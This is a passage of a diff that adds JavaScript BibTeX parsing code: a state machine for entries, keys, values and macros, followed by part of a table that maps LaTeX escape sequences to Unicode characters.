SUCCESS: Parsed a valid start-of-object marker. + // NEXT_STATE: OBJECT_TYPE + this.STATE_ = this.STATES_.OBJECT_TYPE + this.DATA_ = { + ObjectType: '', + } + } + this.BRACETYPE_ = null + this.SKIPWS_ = true + this.SKIPCOMMENT_ = true + break + + // Start at first non-whitespace character after start-of-object '@' + // -- Accept [A-Za-z], break on non-matching character + // -- Populate this.DATA_.EntryType and this.DATA_.ObjectType + case this.STATES_.OBJECT_TYPE: + if (/[A-Za-z]/.test(c)) { + this.DATA_.ObjectType += c.toLowerCase() + this.SKIPWS_ = true + this.SKIPCOMMENT_ = true + } else { + // Break from state and validate object type + const ot = this.DATA_.ObjectType + if (ot == 'comment') { + this.STATE_ = this.STATES_.ENTRY_OR_JUNK + } else { + if (ot == 'string') { + this.DATA_.ObjectType = ot + this.DATA_.Fields = {} + this.BRACETYPE_ = c + this.BRACECOUNT_ = 1 + this.STATE_ = this.STATES_.KV_KEY + this.SKIPWS_ = true + this.SKIPCOMMENT_ = true + this.PARSETMP_ = { + Key: '', + } + } else { + if (ot == 'preamble') { + this.STATE_ = this.STATES_.ENTRY_OR_JUNK + } else { + if (ot in this.ENTRY_TYPES_) { + // SUCCESS: Parsed a valid object type. + // NEXT_STATE: ENTRY_KEY + this.DATA_.ObjectType = 'entry' + this.DATA_.EntryType = ot + this.DATA_.EntryKey = '' + this.STATE_ = this.STATES_.ENTRY_KEY + AnotherIteration = true + } else { + // ERROR: Unrecognized object type. + // NEXT_STATE: ENTRY_OR_JUNK + this.error_( + 'Unrecognized object type: "' + this.DATA_.ObjectType + '"' + ) + this.STATE_ = this.STATES_.ENTRY_OR_JUNK + } + } + } + } + } + break + + // Start at first non-alphabetic character after an entry type + // -- Populate this.DATA_.EntryKey + case this.STATES_.ENTRY_KEY: + if ((c === '{' || c === '(') && this.BRACETYPE_ == null) { + this.BRACETYPE_ = c + this.BRACECOUNT_ = 1 + this.SKIPWS_ = true + this.SKIPCOMMENT_ = true + break + } + if (/[,%\s]/.test(c)) { + if (this.DATA_.EntryKey.length < 1) { + // Skip comments and whitespace before entry key + this.SKIPWS_ = true + this.SKIPCOMMENT_ = true + } else { + if (this.BRACETYPE_ == null) { + // ERROR: No opening brace for object + // NEXT_STATE: ENTRY_OR_JUNK + this.error_('No opening brace for object.') + this.STATE_ = this.STATES_.ENTRY_OR_JUNK + } else { + // SUCCESS: Parsed an entry key + // NEXT_STATE: KV_KEY + this.SKIPWS_ = true + this.SKIPCOMMENT_ = true + AnotherIteration = true + this.STATE_ = this.STATES_.KV_KEY + this.PARSETMP_.Key = '' + this.DATA_.Fields = {} + } + } + } else { + this.DATA_.EntryKey += c + this.SKIPWS_ = false + this.SKIPCOMMENT_ = false + } + break + + // Start at first non-whitespace/comment character after entry key. + // -- Populate this.PARSETMP_.Key + case this.STATES_.KV_KEY: + // Test for end of entry + if ( + (c == '}' && this.BRACETYPE_ == '{') || + (c == ')' && this.BRACETYPE_ == '(') + ) { + // SUCCESS: Parsed an entry, possible incomplete + // NEXT_STATE: ENTRY_OR_JUNK + this.processEntry_() + this.SKIPWS_ = true + this.SKIPCOMMENT_ = true + this.STATE_ = this.STATES_.ENTRY_OR_JUNK + break + } + if (/[\-A-Za-z:]/.test(c)) { + // Add to key + this.PARSETMP_.Key += c + this.SKIPWS_ = false + this.SKIPCOMMENT_ = false + } else { + // Either end of key or we haven't encountered start of key + if (this.PARSETMP_.Key.length < 1) { + // Keep going till we see a key + this.SKIPWS_ = true + this.SKIPCOMMENT_ = true + } else { + // SUCCESS: Found full key in K/V pair + // NEXT_STATE: EQUALS + this.SKIPWS_ = true + this.SKIPCOMMENT_ = true + this.STATE_ = this.STATES_.EQUALS + AnotherIteration = true + + if (this.DATA_.ObjectType !== 'string') { + // this entry is not a macro + // normalize the key to lower case + this.PARSETMP_.Key = this.PARSETMP_.Key.toLowerCase() + + // optimization: skip key/value pairs that are not on the allowlist + this.SKIPKVPAIR_ = + // has allowedKeys set + this.ALLOWEDKEYS_.length && + // key is not on the allowlist + this.ALLOWEDKEYS_.indexOf(this.PARSETMP_.Key) === -1 + } else { + this.SKIPKVPAIR_ = false + } + } + } + break + + // Start at first non-alphabetic character after K/V pair key. + case this.STATES_.EQUALS: + if ( + (c == '}' && this.BRACETYPE_ == '{') || + (c == ')' && this.BRACETYPE_ == '(') + ) { + // ERROR: K/V pair with key but no value + // NEXT_STATE: ENTRY_OR_JUNK + this.error_( + 'Key-value pair has key "' + this.PARSETMP_.Key + '", but no value.' + ) + this.processEntry_() + this.SKIPWS_ = true + this.SKIPCOMMENT_ = true + this.STATE_ = this.STATES_.ENTRY_OR_JUNK + break + } + if (c == '=') { + // SUCCESS: found an equal signs separating key and value + // NEXT_STATE: KV_VALUE + this.SKIPWS_ = true + this.SKIPCOMMENT_ = true + this.STATE_ = this.STATES_.KV_VALUE + this.PARSETMP_.Value = [] + this.VALBRACES_ = { '"': [], '{': [] } + } + break + + // Start at first non-whitespace/comment character after '=' + // -- Populate this.PARSETMP_.Value + case this.STATES_.KV_VALUE: + const delim = this.VALBRACES_ + // valueCharsArray is the list of characters that make up the + // current value + const valueCharsArray = this.PARSETMP_.Value + let doneParsingValue = false + + // Test for special characters + if (c == '"' || c == '{' || c == '}' || c == ',') { + if (c == ',') { + // This comma can mean: + // (1) just another comma literal + // (2) end of a macro reference + if (delim['"'].length + delim['{'].length === 0) { + // end of a macro reference + const macro = this.PARSETMP_.Value.join('').trim() + if (macro in this.MACROS_) { + // Successful macro reference + this.PARSETMP_.Value = [this.MACROS_[macro]] + } else { + // Reference to an undefined macro + this.error_('Reference to an undefined macro: ' + macro) + } + doneParsingValue = true + } + } + if (c == '"') { + // This quote can mean: + // (1) opening delimiter + // (2) closing delimiter + // (3) literal, if we have a '{' on the stack + if (delim['"'].length + delim['{'].length === 0) { + // opening delimiter + delim['"'].push(this.CHAR_) + this.SKIPWS_ = false + this.SKIPCOMMENT_ = false + break + } + if ( + delim['"'].length == 1 && + delim['{'].length == 0 && + (valueCharsArray.length == 0 || + valueCharsArray[valueCharsArray.length - 1] != '\\') + ) { + // closing delimiter + doneParsingValue = true + } else { + // literal, add to value + } + } + if (c == '{') { + // This brace can mean: + // (1) opening delimiter + // (2) stacked verbatim delimiter + if ( + valueCharsArray.length == 0 || + valueCharsArray[valueCharsArray.length - 1] != '\\' + ) { + delim['{'].push(this.CHAR_) + this.SKIPWS_ = false + this.SKIPCOMMENT_ = false + } else { + // literal, add to value + } + } + if (c == '}') { + // This brace can mean: + // (1) closing delimiter + // (2) closing stacked verbatim delimiter + // (3) end of object definition if value was a macro + if (delim['"'].length + delim['{'].length === 0) { + // end of object definition, after macro + const macro = this.PARSETMP_.Value.join('').trim() + if (macro in this.MACROS_) { + // Successful macro reference + this.PARSETMP_.Value = [this.MACROS_[macro]] + } else { + // Reference to an undefined macro + this.error_('Reference to an undefined macro: ' + macro) + } + AnotherIteration = true + doneParsingValue = true + } else { + // sometimes imported bibs will have {\},{\\}, {\\\}, {\\\\}, etc for whitespace, + // which would otherwise break the parsing. we watch for these occurences of + // 1+ backslashes in an empty bracket pair to gracefully handle the malformed bib file + const doubleSlash = + valueCharsArray.length >= 2 && + valueCharsArray[valueCharsArray.length - 1] === '\\' && // for \\} + valueCharsArray[valueCharsArray.length - 2] === '\\' + const singleSlash = + valueCharsArray.length >= 2 && + valueCharsArray[valueCharsArray.length - 1] === '\\' && // for {\} + valueCharsArray[valueCharsArray.length - 2] === '{' + + if ( + valueCharsArray.length == 0 || + valueCharsArray[valueCharsArray.length - 1] != '\\' || // for } + doubleSlash || + singleSlash + ) { + if (delim['{'].length > 0) { + // pop stack for stacked verbatim delimiter + delim['{'].splice(delim['{'].length - 1, 1) + if (delim['{'].length + delim['"'].length == 0) { + // closing delimiter + doneParsingValue = true + } else { + // end verbatim block + } + } + } else { + // literal, add to value + } + } + } + } + + // If here, then we are either done parsing the value or + // have a literal that should be added to the value. + if (doneParsingValue) { + // SUCCESS: value parsed + // NEXT_STATE: KV_KEY + this.SKIPWS_ = true + this.SKIPCOMMENT_ = true + this.STATE_ = this.STATES_.KV_KEY + if (!this.SKIPKVPAIR_) { + this.DATA_.Fields[this.PARSETMP_.Key] = + this.PARSETMP_.Value.join('') + } + this.PARSETMP_ = { Key: '' } + this.VALBRACES_ = null + } else { + this.PARSETMP_.Value.push(c) + if (this.PARSETMP_.Value.length >= 1000 * 20) { + this.PARSETMP_.Value = [] + this.STATE_ = this.STATES_.ENTRY_OR_JUNK + this.DATA_ = { ObjectType: '' } + this.BRACETYPE_ = null + this.SKIPWS_ = true + this.SKIPCOMMENT_ = true + } + } + break + } // end switch (this.STATE_) + } // end while(AnotherIteration) +} // end function processCharacter + +/** @private */ BibtexParser.prototype.CHARCONV_ = [ + [/\\space /g, '\u0020'], + [/\\textdollar /g, '\u0024'], + [/\\textquotesingle /g, '\u0027'], + [/\\ast /g, '\u002A'], + [/\\textbackslash /g, '\u005C'], + [/\\\^\{\}/g, '\u005E'], + [/\\textasciigrave /g, '\u0060'], + [/\\lbrace /g, '\u007B'], + [/\\vert /g, '\u007C'], + [/\\rbrace /g, '\u007D'], + [/\\textasciitilde /g, '\u007E'], + [/\\textexclamdown /g, '\u00A1'], + [/\\textcent /g, '\u00A2'], + [/\\textsterling /g, '\u00A3'], + [/\\textcurrency /g, '\u00A4'], + [/\\textyen /g, '\u00A5'], + [/\\textbrokenbar /g, '\u00A6'], + [/\\textsection /g, '\u00A7'], + [/\\textasciidieresis /g, '\u00A8'], + [/\\textcopyright /g, '\u00A9'], + [/\\textordfeminine /g, '\u00AA'], + [/\\guillemotleft /g, '\u00AB'], + [/\\lnot /g, '\u00AC'], + [/\\textregistered /g, '\u00AE'], + [/\\textasciimacron /g, '\u00AF'], + [/\\textdegree /g, '\u00B0'], + [/\\pm /g, '\u00B1'], + [/\\textasciiacute /g, '\u00B4'], + [/\\mathrm\{\\mu\}/g, '\u00B5'], + [/\\textparagraph /g, '\u00B6'], + [/\\cdot /g, '\u00B7'], + [/\\c\{\}/g, '\u00B8'], + [/\\textordmasculine /g, '\u00BA'], + [/\\guillemotright /g, '\u00BB'], + [/\\textonequarter /g, '\u00BC'], + [/\\textonehalf /g, '\u00BD'], + [/\\textthreequarters /g, '\u00BE'], + [/\\textquestiondown /g, '\u00BF'], + [/\\`\{A\}/g, '\u00C0'], + [/\\'\{A\}/g, '\u00C1'], + [/\\\^\{A\}/g, '\u00C2'], + [/\\~\{A\}/g, '\u00C3'], + [/\\"\{A\}/g, '\u00C4'], + [/\\AA /g, '\u00C5'], + [/\\AE /g, '\u00C6'], + [/\\c\{C\}/g, '\u00C7'], + [/\\`\{E\}/g, '\u00C8'], + [/\\'\{E\}/g, '\u00C9'], + [/\\\^\{E\}/g, '\u00CA'], + [/\\"\{E\}/g, '\u00CB'], + [/\\`\{I\}/g, '\u00CC'], + [/\\'\{I\}/g, '\u00CD'], + [/\\\^\{I\}/g, '\u00CE'], + [/\\"\{I\}/g, '\u00CF'], + [/\\DH /g, '\u00D0'], + [/\\~\{N\}/g, '\u00D1'], + [/\\`\{O\}/g, '\u00D2'], + [/\\'\{O\}/g, '\u00D3'], + [/\\\^\{O\}/g, '\u00D4'], + [/\\~\{O\}/g, '\u00D5'], + [/\\"\{O\}/g, '\u00D6'], + [/\\texttimes /g, '\u00D7'], + [/\\O /g, '\u00D8'], + [/\\`\{U\}/g, '\u00D9'], + [/\\'\{U\}/g, '\u00DA'], + [/\\\^\{U\}/g, '\u00DB'], + [/\\"\{U\}/g, '\u00DC'], + [/\\'\{Y\}/g, '\u00DD'], + [/\\TH /g, '\u00DE'], + [/\\ss /g, '\u00DF'], + [/\\`\{a\}/g, '\u00E0'], + [/\\'\{a\}/g, '\u00E1'], + [/\\\^\{a\}/g, '\u00E2'], + [/\\~\{a\}/g, '\u00E3'], + [/\\"\{a\}/g, '\u00E4'], + [/\\aa /g, '\u00E5'], + [/\\ae /g, '\u00E6'], + [/\\c\{c\}/g, '\u00E7'], + [/\\`\{e\}/g, '\u00E8'], + [/\\'\{e\}/g, '\u00E9'], + [/\\\^\{e\}/g, '\u00EA'], + [/\\"\{e\}/g, '\u00EB'], + [/\\`\{\\i\}/g, '\u00EC'], + [/\\'\{\\i\}/g, '\u00ED'], + [/\\\^\{\\i\}/g, '\u00EE'], + [/\\"\{\\i\}/g, '\u00EF'], + [/\\dh /g, '\u00F0'], + [/\\~\{n\}/g, '\u00F1'], + [/\\`\{o\}/g, '\u00F2'], + [/\\'\{o\}/g, '\u00F3'], + [/\\\^\{o\}/g, '\u00F4'], + [/\\~\{o\}/g, '\u00F5'], + [/\\"\{o\}/g, '\u00F6'], + [/\\div /g, '\u00F7'], + [/\\o /g, '\u00F8'], + [/\\`\{u\}/g, '\u00F9'], + [/\\'\{u\}/g, '\u00FA'], + [/\\\^\{u\}/g, '\u00FB'], + [/\\"\{u\}/g, '\u00FC'], + [/\\'\{y\}/g, '\u00FD'], + [/\\th /g, '\u00FE'], + [/\\"\{y\}/g, '\u00FF'], + [/\\=\{A\}/g, '\u0100'], + [/\\=\{a\}/g, '\u0101'], + [/\\u\{A\}/g, '\u0102'], + [/\\u\{a\}/g, '\u0103'], + [/\\k\{A\}/g, '\u0104'], + [/\\k\{a\}/g, '\u0105'], + [/\\'\{C\}/g, '\u0106'], + [/\\'\{c\}/g, '\u0107'], + [/\\\^\{C\}/g, '\u0108'], + [/\\\^\{c\}/g, '\u0109'], + [/\\.\{C\}/g, '\u010A'], + [/\\.\{c\}/g, '\u010B'], + [/\\v\{C\}/g, '\u010C'], + [/\\v\{c\}/g, '\u010D'], + [/\\v\{D\}/g, '\u010E'], + [/\\v\{d\}/g, '\u010F'], + [/\\DJ /g, '\u0110'], + [/\\dj /g, '\u0111'], + [/\\=\{E\}/g, '\u0112'], + [/\\=\{e\}/g, '\u0113'], + [/\\u\{E\}/g, '\u0114'], + [/\\u\{e\}/g, '\u0115'], + [/\\.\{E\}/g, '\u0116'], + [/\\.\{e\}/g, '\u0117'], + [/\\k\{E\}/g, '\u0118'], + [/\\k\{e\}/g, '\u0119'], + [/\\v\{E\}/g, '\u011A'], + [/\\v\{e\}/g, '\u011B'], + [/\\\^\{G\}/g, '\u011C'], + [/\\\^\{g\}/g, '\u011D'], + [/\\u\{G\}/g, '\u011E'], + [/\\u\{g\}/g, '\u011F'], + [/\\.\{G\}/g, '\u0120'], + [/\\.\{g\}/g, '\u0121'], + [/\\c\{G\}/g, '\u0122'], + [/\\c\{g\}/g, '\u0123'], + [/\\\^\{H\}/g, '\u0124'], + [/\\\^\{h\}/g, '\u0125'], + [/\\Elzxh /g, '\u0127'], + [/\\~\{I\}/g, '\u0128'], + [/\\~\{\\i\}/g, '\u0129'], + [/\\=\{I\}/g, '\u012A'], + [/\\=\{\\i\}/g, '\u012B'], + [/\\u\{I\}/g, '\u012C'], + [/\\u\{\\i\}/g, '\u012D'], + [/\\k\{I\}/g, '\u012E'], + [/\\k\{i\}/g, '\u012F'], + [/\\.\{I\}/g, '\u0130'], + [/\\i /g, '\u0131'], + [/\\\^\{J\}/g, '\u0134'], + [/\\\^\{\\j\}/g, '\u0135'], + [/\\c\{K\}/g, '\u0136'], + [/\\c\{k\}/g, '\u0137'], + [/\\'\{L\}/g, '\u0139'], + [/\\'\{l\}/g, '\u013A'], + [/\\c\{L\}/g, '\u013B'], + [/\\c\{l\}/g, '\u013C'], + [/\\v\{L\}/g, '\u013D'], + [/\\v\{l\}/g, '\u013E'], + [/\\L /g, '\u0141'], + [/\\l /g, '\u0142'], + [/\\'\{N\}/g, '\u0143'], + [/\\'\{n\}/g, '\u0144'], + [/\\c\{N\}/g, '\u0145'], + [/\\c\{n\}/g, '\u0146'], + [/\\v\{N\}/g, '\u0147'], + [/\\v\{n\}/g, '\u0148'], + [/\\NG /g, '\u014A'], + [/\\ng /g, '\u014B'], + [/\\=\{O\}/g, '\u014C'], + [/\\=\{o\}/g, '\u014D'], + [/\\u\{O\}/g, '\u014E'], + [/\\u\{o\}/g, '\u014F'], + [/\\H\{O\}/g, '\u0150'], + [/\\H\{o\}/g, '\u0151'], + [/\\OE /g, '\u0152'], + [/\\oe /g, '\u0153'], + [/\\'\{R\}/g, '\u0154'], + [/\\'\{r\}/g, '\u0155'], + [/\\c\{R\}/g, '\u0156'], + [/\\c\{r\}/g, '\u0157'], + [/\\v\{R\}/g, '\u0158'], + [/\\v\{r\}/g, '\u0159'], + [/\\'\{S\}/g, '\u015A'], + [/\\'\{s\}/g, '\u015B'], + [/\\\^\{S\}/g, '\u015C'], + [/\\\^\{s\}/g, '\u015D'], + [/\\c\{S\}/g, '\u015E'], + [/\\c\{s\}/g, '\u015F'], + [/\\v\{S\}/g, '\u0160'], + [/\\v\{s\}/g, '\u0161'], + [/\\c\{T\}/g, '\u0162'], + [/\\c\{t\}/g, '\u0163'], + [/\\v\{T\}/g, '\u0164'], + [/\\v\{t\}/g, '\u0165'], + [/\\~\{U\}/g, '\u0168'], + [/\\~\{u\}/g, '\u0169'], + [/\\=\{U\}/g, '\u016A'], + [/\\=\{u\}/g, '\u016B'], + [/\\u\{U\}/g, '\u016C'], + [/\\u\{u\}/g, '\u016D'], + [/\\r\{U\}/g, '\u016E'], + [/\\r\{u\}/g, '\u016F'], + [/\\H\{U\}/g, '\u0170'], + [/\\H\{u\}/g, '\u0171'], + [/\\k\{U\}/g, '\u0172'], + [/\\k\{u\}/g, '\u0173'], + [/\\\^\{W\}/g, '\u0174'], + [/\\\^\{w\}/g, '\u0175'], + [/\\\^\{Y\}/g, '\u0176'], + [/\\\^\{y\}/g, '\u0177'], + [/\\"\{Y\}/g, '\u0178'], + [/\\'\{Z\}/g, '\u0179'], + [/\\'\{z\}/g, '\u017A'], + [/\\.\{Z\}/g, '\u017B'], + [/\\.\{z\}/g, '\u017C'], + [/\\v\{Z\}/g, '\u017D'], + [/\\v\{z\}/g, '\u017E'], + [/\\texthvlig /g, '\u0195'], + [/\\textnrleg /g, '\u019E'], + [/\\eth /g, '\u01AA'], + [/\\textdoublepipe /g, '\u01C2'], + [/\\'\{g\}/g, '\u01F5'], + [/\\Elztrna /g, '\u0250'], + [/\\Elztrnsa /g, '\u0252'], + [/\\Elzopeno /g, '\u0254'], + [/\\Elzrtld /g, '\u0256'], + [/\\Elzschwa /g, '\u0259'], + [/\\varepsilon /g, '\u025B'], + [/\\Elzpgamma /g, '\u0263'], + [/\\Elzpbgam /g, '\u0264'], + [/\\Elztrnh /g, '\u0265'], + [/\\Elzbtdl /g, '\u026C'], + [/\\Elzrtll /g, '\u026D'], + [/\\Elztrnm /g, '\u026F'], + [/\\Elztrnmlr /g, '\u0270'], + [/\\Elzltlmr /g, '\u0271'], + [/\\Elzltln /g, '\u0272'], + [/\\Elzrtln /g, '\u0273'], + [/\\Elzclomeg /g, '\u0277'], + [/\\textphi /g, '\u0278'], + [/\\Elztrnr /g, '\u0279'], + [/\\Elztrnrl /g, '\u027A'], + [/\\Elzrttrnr /g, '\u027B'], + [/\\Elzrl /g, '\u027C'], + [/\\Elzrtlr /g, '\u027D'], + [/\\Elzfhr /g, '\u027E'], + [/\\Elzrtls /g, '\u0282'], + [/\\Elzesh /g, '\u0283'], + [/\\Elztrnt /g, '\u0287'], + [/\\Elzrtlt /g, '\u0288'], + [/\\Elzpupsil /g, '\u028A'], + [/\\Elzpscrv /g, '\u028B'], + [/\\Elzinvv /g, '\u028C'], + [/\\Elzinvw /g, '\u028D'], + [/\\Elztrny /g, '\u028E'], + [/\\Elzrtlz /g, '\u0290'], + [/\\Elzyogh /g, '\u0292'], + [/\\Elzglst /g, '\u0294'], + [/\\Elzreglst /g, '\u0295'], + [/\\Elzinglst /g, '\u0296'], + [/\\textturnk /g, '\u029E'], + [/\\Elzdyogh /g, '\u02A4'], + [/\\Elztesh /g, '\u02A7'], + [/\\textasciicaron /g, '\u02C7'], + [/\\Elzverts /g, '\u02C8'], + [/\\Elzverti /g, '\u02CC'], + [/\\Elzlmrk /g, '\u02D0'], + [/\\Elzhlmrk /g, '\u02D1'], + [/\\Elzsbrhr /g, '\u02D2'], + [/\\Elzsblhr /g, '\u02D3'], + [/\\Elzrais /g, '\u02D4'], + [/\\Elzlow /g, '\u02D5'], + [/\\textasciibreve /g, '\u02D8'], + [/\\textperiodcentered /g, '\u02D9'], + [/\\r\{\}/g, '\u02DA'], + [/\\k\{\}/g, '\u02DB'], + [/\\texttildelow /g, '\u02DC'], + [/\\H\{\}/g, '\u02DD'], + [/\\tone\{55\}/g, '\u02E5'], + [/\\tone\{44\}/g, '\u02E6'], + [/\\tone\{33\}/g, '\u02E7'], + [/\\tone\{22\}/g, '\u02E8'], + [/\\tone\{11\}/g, '\u02E9'], + [/\\cyrchar\\C/g, '\u030F'], + [/\\Elzpalh /g, '\u0321'], + [/\\Elzrh /g, '\u0322'], + [/\\Elzsbbrg /g, '\u032A'], + [/\\Elzxl /g, '\u0335'], + [/\\Elzbar /g, '\u0336'], + [/\\'\{A\}/g, '\u0386'], + [/\\'\{E\}/g, '\u0388'], + [/\\'\{H\}/g, '\u0389'], + [/\\'\{\}\{I\}/g, '\u038A'], + [/\\'\{\}O/g, '\u038C'], + [/\\mathrm\{'Y\}/g, '\u038E'], + [/\\mathrm\{'\\Omega\}/g, '\u038F'], + [/\\acute\{\\ddot\{\\iota\}\}/g, '\u0390'], + [/\\Alpha /g, '\u0391'], + [/\\Beta /g, '\u0392'], + [/\\Gamma /g, '\u0393'], + [/\\Delta /g, '\u0394'], + [/\\Epsilon /g, '\u0395'], + [/\\Zeta /g, '\u0396'], + [/\\Eta /g, '\u0397'], + [/\\Theta /g, '\u0398'], + [/\\Iota /g, '\u0399'], + [/\\Kappa /g, '\u039A'], + [/\\Lambda /g, '\u039B'], + [/\\Xi /g, '\u039E'], + [/\\Pi /g, '\u03A0'], + [/\\Rho /g, '\u03A1'], + [/\\Sigma /g, '\u03A3'], + [/\\Tau /g, '\u03A4'], + [/\\Upsilon /g, '\u03A5'], + [/\\Phi /g, '\u03A6'], + [/\\Chi /g, '\u03A7'], + [/\\Psi /g, '\u03A8'], + [/\\Omega /g, '\u03A9'], + [/\\mathrm\{\\ddot\{I\}\}/g, '\u03AA'], + [/\\mathrm\{\\ddot\{Y\}\}/g, '\u03AB'], + [/\\'\{\$\\alpha\$\}/g, '\u03AC'], + [/\\acute\{\\epsilon\}/g, '\u03AD'], + [/\\acute\{\\eta\}/g, '\u03AE'], + [/\\acute\{\\iota\}/g, '\u03AF'], + [/\\acute\{\\ddot\{\\upsilon\}\}/g, '\u03B0'], + [/\\alpha /g, '\u03B1'], + [/\\beta /g, '\u03B2'], + [/\\gamma /g, '\u03B3'], + [/\\delta /g, '\u03B4'], + [/\\epsilon /g, '\u03B5'], + [/\\zeta /g, '\u03B6'], + [/\\eta /g, '\u03B7'], + [/\\texttheta /g, '\u03B8'], + [/\\iota /g, '\u03B9'], + [/\\kappa /g, '\u03BA'], + [/\\lambda /g, '\u03BB'], + [/\\mu /g, '\u03BC'], + [/\\nu /g, '\u03BD'], + [/\\xi /g, '\u03BE'], + [/\\pi /g, '\u03C0'], + [/\\rho /g, '\u03C1'], + [/\\varsigma /g, '\u03C2'], + [/\\sigma /g, '\u03C3'], + [/\\tau /g, '\u03C4'], + [/\\upsilon /g, '\u03C5'], + [/\\varphi /g, '\u03C6'], + [/\\chi /g, '\u03C7'], + [/\\psi /g, '\u03C8'], + [/\\omega /g, '\u03C9'], + [/\\ddot\{\\iota\}/g, '\u03CA'], + [/\\ddot\{\\upsilon\}/g, '\u03CB'], + [/\\'\{o\}/g, '\u03CC'], + [/\\acute\{\\upsilon\}/g, '\u03CD'], + [/\\acute\{\\omega\}/g, '\u03CE'], + [/\\Pisymbol\{ppi022\}\{87\}/g, '\u03D0'], + [/\\textvartheta /g, '\u03D1'], + [/\\Upsilon /g, '\u03D2'], + [/\\phi /g, '\u03D5'], + [/\\varpi /g, '\u03D6'], + [/\\Stigma /g, '\u03DA'], + [/\\Digamma /g, '\u03DC'], + [/\\digamma /g, '\u03DD'], + [/\\Koppa /g, '\u03DE'], + [/\\Sampi /g, '\u03E0'], + [/\\varkappa /g, '\u03F0'], + [/\\varrho /g, '\u03F1'], + [/\\textTheta /g, '\u03F4'], + [/\\backepsilon /g, '\u03F6'], + [/\\cyrchar\\CYRYO /g, '\u0401'], + [/\\cyrchar\\CYRDJE /g, '\u0402'], + [/\\cyrchar\{\\'\\CYRG\}/g, '\u0403'], + [/\\cyrchar\\CYRIE /g, '\u0404'], + [/\\cyrchar\\CYRDZE /g, '\u0405'], + [/\\cyrchar\\CYRII /g, '\u0406'], + [/\\cyrchar\\CYRYI /g, '\u0407'], + [/\\cyrchar\\CYRJE /g, '\u0408'], + [/\\cyrchar\\CYRLJE /g, '\u0409'], + [/\\cyrchar\\CYRNJE /g, '\u040A'], + [/\\cyrchar\\CYRTSHE /g, '\u040B'], + [/\\cyrchar\{\\'\\CYRK\}/g, '\u040C'], + [/\\cyrchar\\CYRUSHRT /g, '\u040E'], + [/\\cyrchar\\CYRDZHE /g, '\u040F'], + [/\\cyrchar\\CYRA /g, '\u0410'], + [/\\cyrchar\\CYRB /g, '\u0411'], + [/\\cyrchar\\CYRV /g, '\u0412'], + [/\\cyrchar\\CYRG /g, '\u0413'], + [/\\cyrchar\\CYRD /g, '\u0414'], + [/\\cyrchar\\CYRE /g, '\u0415'], + [/\\cyrchar\\CYRZH /g, '\u0416'], + [/\\cyrchar\\CYRZ /g, '\u0417'], + [/\\cyrchar\\CYRI /g, '\u0418'], + [/\\cyrchar\\CYRISHRT /g, '\u0419'], + [/\\cyrchar\\CYRK /g, '\u041A'], + [/\\cyrchar\\CYRL /g, '\u041B'], + [/\\cyrchar\\CYRM /g, '\u041C'], + [/\\cyrchar\\CYRN /g, '\u041D'], + [/\\cyrchar\\CYRO /g, '\u041E'], + [/\\cyrchar\\CYRP /g, '\u041F'], + [/\\cyrchar\\CYRR /g, '\u0420'], + [/\\cyrchar\\CYRS /g, '\u0421'], + [/\\cyrchar\\CYRT /g, '\u0422'], + [/\\cyrchar\\CYRU /g, '\u0423'], + [/\\cyrchar\\CYRF /g, '\u0424'], + [/\\cyrchar\\CYRH /g, '\u0425'], + [/\\cyrchar\\CYRC /g, '\u0426'], + [/\\cyrchar\\CYRCH /g, '\u0427'], + [/\\cyrchar\\CYRSH /g, '\u0428'], + [/\\cyrchar\\CYRSHCH /g, '\u0429'], + [/\\cyrchar\\CYRHRDSN /g, '\u042A'], + [/\\cyrchar\\CYRERY /g, '\u042B'], + [/\\cyrchar\\CYRSFTSN /g, '\u042C'], + [/\\cyrchar\\CYREREV /g, '\u042D'], + [/\\cyrchar\\CYRYU /g, '\u042E'], + [/\\cyrchar\\CYRYA /g, '\u042F'], + [/\\cyrchar\\cyra /g, '\u0430'], + [/\\cyrchar\\cyrb /g, '\u0431'], + [/\\cyrchar\\cyrv /g, '\u0432'], + [/\\cyrchar\\cyrg /g, '\u0433'], + [/\\cyrchar\\cyrd /g, '\u0434'], + [/\\cyrchar\\cyre /g, '\u0435'], + [/\\cyrchar\\cyrzh /g, '\u0436'], + [/\\cyrchar\\cyrz /g, '\u0437'], + [/\\cyrchar\\cyri /g, '\u0438'], + [/\\cyrchar\\cyrishrt /g, '\u0439'], + [/\\cyrchar\\cyrk /g, '\u043A'], + [/\\cyrchar\\cyrl /g, '\u043B'], + [/\\cyrchar\\cyrm /g, '\u043C'], + [/\\cyrchar\\cyrn /g, '\u043D'], + [/\\cyrchar\\cyro /g, '\u043E'], + [/\\cyrchar\\cyrp /g, '\u043F'], + [/\\cyrchar\\cyrr /g, '\u0440'], + [/\\cyrchar\\cyrs /g, '\u0441'], + [/\\cyrchar\\cyrt /g, '\u0442'], + [/\\cyrchar\\cyru /g, '\u0443'], + [/\\cyrchar\\cyrf /g, '\u0444'], + [/\\cyrchar\\cyrh /g, '\u0445'], + [/\\cyrchar\\cyrc /g, '\u0446'], + [/\\cyrchar\\cyrch /g, '\u0447'], + [/\\cyrchar\\cyrsh /g, '\u0448'], + [/\\cyrchar\\cyrshch /g, '\u0449'], + [/\\cyrchar\\cyrhrdsn /g, '\u044A'], + [/\\cyrchar\\cyrery /g, '\u044B'], + [/\\cyrchar\\cyrsftsn /g, '\u044C'], + [/\\cyrchar\\cyrerev /g, '\u044D'], + [/\\cyrchar\\cyryu /g, '\u044E'], + [/\\cyrchar\\cyrya /g, '\u044F'], + [/\\cyrchar\\cyryo /g, '\u0451'], + [/\\cyrchar\\cyrdje /g, '\u0452'], + [/\\cyrchar\{\\'\\cyrg\}/g, '\u0453'], + [/\\cyrchar\\cyrie /g, '\u0454'], + [/\\cyrchar\\cyrdze /g, '\u0455'], + [/\\cyrchar\\cyrii /g, '\u0456'], + [/\\cyrchar\\cyryi /g, '\u0457'], + [/\\cyrchar\\cyrje /g, '\u0458'], + [/\\cyrchar\\cyrlje /g, '\u0459'], + [/\\cyrchar\\cyrnje /g, '\u045A'], + [/\\cyrchar\\cyrtshe /g, '\u045B'], + [/\\cyrchar\{\\'\\cyrk\}/g, '\u045C'], + [/\\cyrchar\\cyrushrt /g, '\u045E'], + [/\\cyrchar\\cyrdzhe /g, '\u045F'], + [/\\cyrchar\\CYROMEGA /g, '\u0460'], + [/\\cyrchar\\cyromega /g, '\u0461'], + [/\\cyrchar\\CYRYAT /g, '\u0462'], + [/\\cyrchar\\CYRIOTE /g, '\u0464'], + [/\\cyrchar\\cyriote /g, '\u0465'], + [/\\cyrchar\\CYRLYUS /g, '\u0466'], + [/\\cyrchar\\cyrlyus /g, '\u0467'], + [/\\cyrchar\\CYRIOTLYUS /g, '\u0468'], + 